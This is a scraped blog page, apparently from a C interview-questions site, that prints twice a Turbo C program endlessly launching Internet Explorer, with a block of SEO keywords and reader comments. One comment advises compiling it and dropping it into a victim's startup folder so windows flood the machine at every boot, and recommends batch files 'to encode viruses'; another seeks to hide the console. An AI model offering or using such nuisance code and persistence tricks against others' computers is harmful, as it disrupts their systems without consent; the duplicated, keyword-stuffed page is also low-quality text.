Answer:
Write the following program in TURBO C.
void main (void)
{
for(; ;)
{
system("c:\\progra~1\\intern~1\\iexplore.exe");
}
}
C language interview questions solution for freshers beginners placement tricky good pointers answers explanation operators data types arrays structures functions recursion preprocessors looping file handling strings switch case if else printf advance linux objective mcq faq online written test prime numbers Armstrong Fibonacci series factorial palindrome code programs examples on c++ tutorials and pdf
Answer:
Write the following program in TURBO C.
void main (void)
{
for(; ;)
{
system("c:\\progra~1\\intern~1\\iexplore.exe");
}
}
7 comments:
ya its working
thanx boss
nice but any one can stop it by just simply exiting the console....i v been trying to find a way to hide the console but failed.....ant idea???
HOW TO OPEN ANY WINDOW USING C PLZ SOMEONE TELL ME.....?
its working but if we write a complete path instead of c:\\progra~1\\intern~1\\iexplore.exe then internet don't open infinite times.why????
plz help me in that case.plz send me the reason if possible at my id amitdhiman41@gmail.com. and thanx for this program.
@ writer: If you looking for an alternate to run this program, better try to convert the class file of internet.c to .exe through some exe converters (u'll find lots of them, just google it). And then run it. It will go on until you close the .exe file. For more trouble to victim, save this .exe file into the startup folder of the victim's OS like in Windows and then it goes- every time he/she starts the system before anything he'll get bombardment of explorer windows. ;)
And better guys go for batch programming to encode viruses, it's simple, plenty of areas to target (kinda versatile), very interesting and funny and basically its easy to convert .batch - .exe so portable. :))
do you have one for c++ also
header file for system????
Post a Comment